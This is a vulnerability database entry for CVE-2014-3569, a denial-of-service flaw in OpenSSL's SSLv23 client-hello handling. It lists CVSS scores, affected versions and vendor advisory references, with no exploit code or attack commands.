ID CVE-2014-3569
Summary The ssl23_get_client_hello function in s23_srvr.c in OpenSSL 0.9.8zc, 1.0.0o, and 1.0.1j does not properly handle attempts to use unsupported protocols, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an unexpected handshake, as demonstrated by an SSLv3 handshake to a no-ssl3 application with certain error handling. NOTE: this issue became relevant after the CVE-2014-3568 fix. <a href="http://cwe.mitre.org/data/definitions/476.html">CWE-476: NULL Pointer Dereference</a>
References
Vulnerable Configurations
  • cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*
    cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*
CVSS
Base: 5.0 (as of 15-11-2017 - 02:29)
Impact:
Exploitability:
CWE NVD-CWE-Other
CAPEC
Access
VectorComplexityAuthentication
NETWORK LOW NONE
Impact
ConfidentialityIntegrityAvailability
NONE NONE PARTIAL
cvss-vector via4 AV:N/AC:L/Au:N/C:N/I:N/A:P
refmap via4
apple APPLE-SA-2015-04-08-2
bid 71934
cisco 20150310 Multiple Vulnerabilities in OpenSSL (January 2015) Affecting Cisco Products
confirm
debian DSA-3125
hp
  • HPSBHF03289
  • HPSBMU03380
  • HPSBMU03396
  • HPSBMU03397
  • HPSBMU03409
  • HPSBMU03413
  • HPSBOV03318
  • HPSBUX03162
  • HPSBUX03244
  • SSRT101885
mandriva
  • MDVSA-2015:019
  • MDVSA-2015:062
sectrack 1033378
suse
  • SUSE-SU-2015:0946
  • openSUSE-SU-2015:0130
  • openSUSE-SU-2016:0640
Last major update 15-11-2017 - 02:29
Published 24-12-2014 - 11:59
Last modified 15-11-2017 - 02:29
Back to Top